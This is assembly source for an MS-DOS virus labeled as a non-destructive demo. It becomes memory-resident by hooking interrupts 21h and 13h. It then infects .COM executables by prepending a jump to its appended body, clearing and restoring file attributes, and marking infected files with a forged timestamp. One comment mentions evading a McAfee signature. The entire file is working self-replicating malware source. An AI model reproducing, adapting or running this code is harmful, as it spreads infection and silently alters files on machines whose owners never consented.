;***************************************************************************** ; VIRUS DEMO (not destructive) ;----------------------------------------------------------------------------- len equ 037eh plen equ 014eh cplace equ 9800h ;----------------------------------------------------------------------------- ; FIND FIRST FILE ;----------------------------------------------------------------------------- jmp con ; check if a virusing operation required. cmp ah,3dh ;open file je con cmp ah,0fh ;open file je con cmp ah,4bh ;exec!!! je con cmp ah,0eh ;select disk je con cmp ah,5bh ;create file je con cmp ah,16h ;create file je con cmp ah,3ch ;create file je con cmp ah,41h ;delete file je con cmp ah,13h ;delete file je con cmp ah,56h ;rename file je con cmp ah,17h ;rename file je con ; end of check int 6bh iret con: push ax push bx push cx push es push ds push dx ;---------------------------------------------------------------------------- ; cancel this line: put int 6b to int 21 & int 21 to 6b ; put int 6c to int 13 & int 13 to 6c ;---------------------------------------------------------------------------- ; swap int 13 with int 6c mov ax,0 mov ds,ax push word ptr [01b0h] ; int 6c push word ptr [01b2h] push word ptr [004ch] ; int 13 push word ptr [004eh] pop word ptr [01b2h] ; put int 13 to 6c pop word ptr [01b0h] pop word ptr [004eh] ; put int 6c to int 13 pop word ptr [004ch] ;----------------------------------------------------------------------------- ; find first file ;----------------------------------------------------------------------------- mov ah,1ah mov dx,cs mov ds,dx mov dx,offset buff int 6bh mov ah,4eh mov cx,0 mov dx,cs mov ds,dx mov dx,offset fname int 6bh jc error1 ;---------------------------------------------------------------------------- ; CHECK THE TIME OF FILE TO SEE IF IT IS 31*2 SEC ;---------------------------------------------------------------------------- lfnd: mov ax,word ptr buff+16h and ax,31 cmp ax,31 jne maketim ;if time not 31 make time 31 and continue ; find next .com file mov ah,4fh int 6bh jc error1 jmp lfnd ; maketim: mov ax,word ptr buff+16h and ax,65504 ;zero 5 firsty bits add ax,31 mov word ptr buff+16h,ax ; put the fixed date ; ---------------------------------------------------------------------- ; change the file attributes to 0 (against read only flag) ;---------------------------------------------------------------------- mov ax,cs mov ds,ax mov ax,4301h mov cx,0 mov dx,offset buff add dx,30 int 6bh ; changed attributes to 0 ; find file size ;mov ax,word ptr buff+1ah ; open the file mov ah,3dh mov al,2 mov dx,cs mov ds,dx mov dx,offset buff add dx,30 int 6bh jc error1 mov fhandle,ax ;------------------------------------ ; close ;----------------------------------- jmp cont ;----------------------------------------------------------------------------- ; NOT FAR ERROR (here mcafee searches for the string) ;----------------------------------------------------------------------------- error1: jmp error ;----------------------------------------------------------------------------- ; PUT THE CALL INSTRUCTION CODE IN BUFF ;----------------------------------------------------------------------------- cont: mov ax,word ptr buff+1ah ; ax=the file size sub ax,3 ;find the disp for the jump code mov buff+1,al mov buff+2,ah mov ax,00e8h mov buff,al ;----------------------------------------------------------------------------- ; READ THE 3 FIRST BYTES FROM THE FILE ;----------------------------------------------------------------------------- mov ah,42h mov al,0 mov bx,fhandle mov cx,0 mov dx,0 int 6bh jc error1 mov ah,3fh mov dx,cs mov ds,dx mov dx,offset buff add dx,3 mov bx,fhandle mov cx,3 int 6bh jc error1 cmp ax,cx jl error1 ;----------------------------------------------------------------------------- ; MOVE 3 BYTES FROM BUFF+3 TO dat1-3 ;----------------------------------------------------------------------------- mov al,buff+3 mov dat1,al mov al,buff+4 mov dat2,al mov al,buff+5 mov dat3,al ;----------------------------------------------------------------------------- ; WRITE THE JMP INSTRUCTION TO THE DISK ;----------------------------------------------------------------------------- mov ah,42h mov al,0 mov bx,fhandle mov cx,0 mov dx,0 int 6bh jc error1 mov ah,40h mov dx,cs mov ds,dx mov dx,offset buff mov bx,fhandle mov cx,3 int 6bh jc error1 cmp ax,3 jne error ;----------------------------------------------------------------------------- ; CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF ;----------------------------------------------------------------------------- mov ax,word ptr buff+1ah add ax,100h add ax,plen mov sdat1,al mov sdat1+1,ah ;----------------------------------------------------------------------------- ; WRITE THE VIRUS PREFIX TO DISK ;----------------------------------------------------------------------------- mov ah,42h mov al,2 mov bx,fhandle mov cx,0 mov dx,0 int 6bh jc error mov ah,40h mov dx,cs mov ds,dx mov dx,offset data mov bx,fhandle mov cx,plen int 6bh jc error cmp ax,plen jne error ;---------------------------------------------------------------------------- ; ;---------------------------------------------------------------------------- mov ah,40h mov dx,cs mov ds,dx mov dx,0100h mov bx,fhandle mov cx,len int 6bh jc error cmp ax,len jne error ;----------------------------------------------------------------------------- ; set old date again + fixed time ;----------------------------------------------------------------------------- mov ah,57h mov al,01h mov bx,fhandle mov cx,word ptr buff+16h mov dx,word ptr buff+18h int 6bh ;---------------------------------------------------------------------------- ; put the old attributes back ;---------------------------------------------------------------------------- mov ax,cs mov ds,ax mov ax,4301h mov cl,byte ptr buff+15h mov ch,0 mov dx,offset buff add dx,30 int 6bh ;----------------------------------------------------------------------------- ; CLOSE FILE ;----------------------------------------------------------------------------- error: mov ah,3eh mov bx,fhandle int 6bh ;----------------------------------------------------------------------------- ; swap back int 13 with int 6c mov ax,0 mov ds,ax push word ptr [01b0h] ; int 6c push word ptr [01b2h] push word ptr [004ch] ; int 13 push word ptr [004eh] pop word ptr [01b2h] ; put int 13 to 6c pop word ptr [01b0h] pop word ptr [004eh] ; put int 6c to int 13 pop word ptr [004ch] ;----------------------------------------------------------------------------- pop dx pop ds pop es pop cx pop bx pop ax int 6bh iret ;***************************************************************************** ; DATA SECTION ;----------------------------------------------------------------------------- buff db 43 dup (0) fname db "*.COM",0 fhandle dw ? data db 198,6,0,1 dat1 db 0 datb db 198,6,1,1 dat2 db 0 datc db 198,6,2,1 dat3 db 0 pop bx ;change the call data to 100h mov bx,100h push bx ; push all registeres push ax push dx push ds ;----------------------------------------------------------------------------- ; check if virus is already in MEMORY ; if it is, use the one in memory ;----------------------------------------------------------------------------- mov ax,0 mov ds,ax mov ax,[01ach] cmp ax,0 jne ggo00 ; find cplace and push it mov ax,0 mov ds,ax mov ax,[413h] mov bx,40h mul bx sub ax,867h mov cx,ax push cx ; mov cx,len source db 190 ;MOV SI,OFFSET SOURCE sdat1 db 0,0 mov di,100h push cs pop ds pop es ;cplace-> now 9800h cld rep movsb ;------------------------------------------------------------------------------ ; put int 21 => int 6b & int 13 => int 6c ;------------------------------------------------------------------------------ mov ax,3000h int 21h ; make sure int 21 is not yet hooked !!!!!! d20: mov si,00bah cmp al,2h je didit cmp ax,0003h jbe didit d30: mov si,00b6h didit: mov ax,0 mov ds,ax mov ax,[si] mov ds,ax mov si,0000h fnd: mov al,2eh mov ah,80h cmp al,[si] jne do33 mov al,3ah cmp al,[si+1] jne do33 mov al,26h cmp al,[si+2] jne do33 mov al,0dh cmp al,[si+4] je found jmp do33 ;----------------------------------------- ; bridge for far jump ggo00: jmp ggo ;---------------------------------------- do33: cmp ah,[si] jne nohing mov ah,0fch cmp ah,[si+1] jne nohing mov ah,4bh cmp ah,[si+2] jne nohing mov ah,5h cmp ah,[si+4] je found nohing: inc si cmp si,0fffch jne fnd ; hook to int 21 (there is no another choice) mov dx,0 mov ds,dx push word ptr [84h] pop word ptr [1ach] ; put int 21 to int 6b push word ptr [86h] pop word ptr [1aeh] ; put int 21 to int 6b jmp ft13 ; end of hook found: push ds mov ax,0 mov ds,ax pop [01aeh] ; data seg of int 6b push si pop [01ach] ; offset of int 6b ;----------------------------------------------------------------------------- ;---------------------------------------------------------------------------- ; find int 13h ; ft13: mov si,0 mov ds,si mov ax,3000h int 21h mov cx,0c800h mov bx,215dh mov [004ch],bx mov [004eh],cx cmp al,2 je hooked mov ax,[003eh] mov ds,ax mov ax,0a32eh mov bx,809ch mov cl,2eh fnd13: cmp [si],al jne loko cmp ah,[si+1] jne loko cmp bl,[si+4] jne loko cmp bh,[si+5] je put13 cmp cl,[si+5] je put13 loko: inc si cmp si,0fffch jne fnd13 ;put int 13 to int 6c mov dx,0 mov ds,dx push word ptr [004ch] pop word ptr [01b0h] push word ptr [004eh] pop word ptr [01b2h] jmp hooked ;end of hook put13: push ds mov ax,0 mov ds,ax pop [01b2h] mov [01b0h],si ;------------------------------------------------------------------------ ; HOOK THE VIRUS TO INT 21 ;------------------------------------------------------------------------ ; hook the virus hooked: mov ax,102h mov [84h],ax mov [86h],es ;put cplace ;----------------------------------------------------------------------- ; ;----------------------------------------------------------------------- ggo: mov ah,0fh int 21h ; pop all registeres pop ds pop dx pop ax ret